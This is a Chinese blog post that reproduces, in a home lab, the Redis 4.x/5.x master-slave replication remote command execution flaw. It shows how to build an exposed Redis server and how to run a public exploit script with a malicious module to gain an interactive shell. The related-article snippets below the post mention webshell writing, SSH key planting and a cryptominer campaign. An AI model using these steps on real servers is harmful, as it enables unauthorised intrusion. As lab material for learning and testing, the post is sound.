漏洞复现---Redis 远程命令执行漏洞复现

最新推荐文章于 2024-05-28 15:44:55 发布
最新推荐文章于 2024-05-28 15:44:55 发布
阅读量6.7k 收藏 12
点赞数 4
分类专栏: 漏洞复现 文章标签: redis redis远程命令执行 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dust_hk/article/details/95382694
版权

0x00 Redis介绍

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步。
Redis 是一个高性能的key-value数据库。 redis的出现,很大程度补偿了memcached这类key/value存储的不足,在部 分场合可以对关系数据库起到很好的补充作用。它提供了Java,C/C++,C#,PHP,JavaScript,Perl,Object-C,Python,Ruby,Erlang等客户端,使用很方便。

0x01 搭建漏洞环境

Poc下载链接:poc
.so编译文件下载链接:RedisModules-ExecuteCommand
环境搭建参考链接:https://blog.csdn.net/buyueliuying/article/details/82316517
以Redis 4.0.11为例。
攻击机:kali 192.168.58.128
Redis主机:kali 192.168.58.131
影响范围:redis4.x、5.x
1)Kali下载Redis包:

Wget download.redis.io/releases/redis-4.0.11.tar.gz

在这里插入图片描述
2)解压

tar xzvf redis-4.0.11.tar.gz

在这里插入图片描述
3)make安装
进入/usr/local/目录中建立redis目录;

make PREFIX=/usr/local/redis install

在这里插入图片描述
安装完成。
在这里插入图片描述
4)检查安装是否有问题

make test

在这里插入图片描述
如果提示 You need tcl 8.5 or newer in order to run the Redis test
需要安装tcl解决:yum -y install tcl

5)拷贝源码中的redis.conf到/usr/local/redis中

cp /redis-4.0.11/redis.conf /usr/local/redis

进入redis目录

cd /usr/local/redis

修改redis.conf中的以下参数:
①找到bind 127.0.0.1并注释掉;
②修改protected-mode属性值为no;
(redis默认是只能本地访问,注释掉并且将保护模式禁用以后可以通过IP访问)
③修改daemonize no为daemonize yes,标识redis以后台方式启动
6)服务端启动服务

/usr/local/redis/bin/redis-server /usr/local/redis/redis.conf

在这里插入图片描述
7)启动客户端连接并测试

/usr/local/redis/bin/redis-cli

在这里插入图片描述
【停止redis服务–> /usr/local/redis/bin/redis-cli shutdown或者 kill `pidof redis-server`】
【通过Linux命令调用窗口文件目录,适用于中文版Linux–>gnome-open /etc或者在Ubuntu中使用 nautilus /etc】
【测试 redis-cli -h 服务器ip -p 6379 -a 密码(例:redis-cli -h 192.168.1.1 -p 6379 -a 123)】
【开放6379端口:/sbin/iptables -I INPUT -p tcp --dport 6379 -j ACCEPT 然后重启redis】
【查看开启的端口:netstat -lntp】
【测试ip端口能否访问: wget ip:port】

0x02 攻击

在攻击者kali机中下载 RedisModules-ExecuteCommand,下载地址:
https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
1)下载.so编译文件

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git

进入RedisModules-ExecuteCommand目录中,直接make编译
在这里插入图片描述
2)编译后的module.so文件存在src目录下,复制到poc目录下
在这里插入图片描述
这里解释下,poc包里的exp_lin.so和module.so其实是同一个文件,在攻击过程中也可以使用exp_lin.so文件,这里只是说明此文件生成过程。
在这里插入图片描述
3)跑一下poc

Python redis-rce.py -r 目标机ip -L 攻击机ip -f module.so

选择i进入交互模式。
在这里插入图片描述
=【请勿用于非法攻击!!!】=

北境L
关注
  • 4
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
漏洞复现---- Redis 4.x/5.x 未授权访问漏洞
qq_43168364的博客
12-24 1239
一、简介 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库。Redis提供了多种语言的API。Redis默认使用6379端口 Redis未授权漏洞产生的原因 ---- Redis默认使用6379端口,并且Redis默认是空密码并且默认允许远程连接。一些管理员在安装好Redis之后,并没有修改它的默认端口。而且也没有设置密码的话,黑客就可以通过Redis数据库写入任意文件进行提权,从而操控该服务器。 Redis未授权访问在4.x/5.0.5以前
resty-redis-cluster:Redis集群的Openresty lua客户端
02-03
《深入理解resty-redis-cluster:Openresty Lua中的Redis集群客户端》 在现代Web服务开发中,数据存储和缓存扮演着至关重要的角色。Redis作为一款高性能的键值存储系统,广泛应用于缓存、消息队列等领域。而...
【渗透测试】redis漏洞利用
qq_48201589的博客
03-16 1201
redis是一个key-value存储系统,在诸多版本中存在一系列的漏洞,对漏洞进行复现:写入Webshell、写入定时任务、主从复制命令执行、如何通过利用SSRF结合gopher、dict协议打redis。切勿利用漏洞非法获取数据
Redis数据库与远程连接漏洞利用
x506812022的博客
10-04 676
redis数据库有安全漏洞,所以我们需要加强自身的安全防护。
Redis漏洞总结
白帽子佳奇的博客
05-28 867
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。
H2Miner变种,利用Redis漏洞入侵云服务器wa矿
热门推荐
China Honker 博客
01-12 114万+
H2Miner变种木马入侵后会下载挖矿木马,通过安装定时任务持久化,通过SSH复用连接进行横向移动感染。该程序由GO语言开发,通过还原后的函数名进行对比,可知其是H2Miner此前的kinsing文件变种,并且与http[:]//45.10.88.124/kinsing下载得到的文件一致。Redis 4.x/5.x 版本存在主从同步命令执行漏洞(CNVD-2019-21763),攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,该漏洞风险较高,且漏洞利用方式已被公开。
redis漏洞利用总结
good good study
10-17 6429
redis属于非关系型数据库,在开启后默认监听端口为6379。若Redis配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,存在未授权访问,弱口令或者口令泄露等主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。Redis的持久化使得机器即使重启数据也不会丢失,因为redis服务器重启后会把硬盘上的文件重新恢复到内存中。
墨者学院 - Redis配置错误导致的远程代码漏洞溯源
a519395243的博客
01-04 845
给了2个端口,其中一个是redis 的 (后面那个) 虚拟机上安装 redis-cli (可以用宝塔直接安装 redis) redis-cli  -h 219.153.49.228 -p 49375 设置路径和文件名 CONFIG SET dir /var/www/html CONFIG SET dbfilename shell.php 写入文件 SET shell "<?...
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
Docker-Compose--RedisRedis DockerFile
02-10
Docker构建Nginx的传播詹金斯雷迪斯
spring-boot-整合redis
03-08
可以通过注入RedisTemplate来执行各种Redis命令,如存储数据、检索数据等。 操作Redis数据:可以使用RedisTemplate或者StringRedisTemplate(如果数据类型是字符串)来执行基本的CRUD操作,如opsForValue().set()...
redis4.0x5.0x-远程命令漏洞利用exp.rar
07-09
redis4.0x5.0x-远程命令漏洞利用exp 2019年7月9日版,仅用来学习测试,不可用于非法用途,谢谢配合,实测可用
redis-session-manager-redis-session-manager-2.2.1.tar.gz
最新发布
06-02
这个压缩包文件"redis-session-manager-redis-session-manager-2.2.1.tar.gz"包含了该工具的2.2.1版本,适用于Linux操作系统,并且提供免费下载。 Redis是一个开源的、先进的键值存储系统,它被广泛用作数据库、...
一文清晰带你认识redis漏洞
逍遥小哥的博客
02-01 1401
主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。数据持久化:Redis提供持久化功能,可以将数据保存到磁盘上,以防止数据丢失。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis未授权访问利用合集
em.....
07-07 836
微信公众号:小惜渗透,欢迎大佬一起交流进步正常redis默认情况下,会绑定在0.0.0.0:6379,如果没有限制来源IP并且甚至没有密码,那么就会导致攻击者非法访问,并读取Redis的数据,还可以利用自身config命令进行写入操作,攻击者可将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys中,进而直接使用对应私钥登录目标服务器。搭建环境: 将这行绑定本地加上注释(还可以改成0.0.0.0)将保护模式关闭保存,然后启动redis服务 切记别忘了关防火墙在/roo
Redis - - Redis 远程代码执行漏洞
weixin_34150830的博客
12-14 471
1,利用redis漏洞远程登录服务器 1.1 登录远程 redis 并写入ssh公钥 [root@test ~]# redis-cli -h 192.168.168.168 -p 6379 -a 123456 # 设置路径等配置(必须有写入权限) 192.168.168.168:6379> config set dir /root/.ssh OK # 上传公钥的备份文件名字为autho...
Redis系列漏洞总结
NLost
10-21 6234
未授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 沙盒绕过rce
Redis 漏洞总结
qq_41696518的博客
06-26 2970
其实漏洞的原理无外乎就2点:1. 能连接Redis,这是利用的前提。2. linux一切皆文件,要利用的服务可通过修改文件内容达成。
华为云云耀云服务器L实例评测|认识redis未授权访问漏洞 & 漏洞的部分复现 & 设置连接密码 & redis其他命令学习
Arya的博客,专注后端领域
09-16 479
本篇博客介绍redis连接密码设置以保证redis缓存数据库的安全性,以及查看redis数据库相关情况的命令
spring-boot-starter-data-redis与spring-boot-starter-redis区别
10-13
spring-boot-starter-data-redis和spring-boot-starter-redis都是Spring Boot框架中与Redis集成的starter依赖,但它们的作用略有不同。 spring-boot-starter-data-redis是Spring Data Redis的starter依赖,它提供了对Redis的支持,包括使用RedisTemplate和Spring Data Redis Repository访问Redis数据库等功能。 而spring-boot-starter-redis则是Lettuce和Jedis的starter依赖,它提供了对Redis客户端的支持,包括使用Lettuce或Jedis连接Redis服务器等功能。 因此,如果你需要在Spring Boot应用中使用Spring Data Redis提供的高级功能,比如Repository访问等,则应该选择spring-boot-starter-data-redis;如果你只需要使用Redis客户端连接Redis服务器,则可以选择spring-boot-starter-redis

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北境L

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值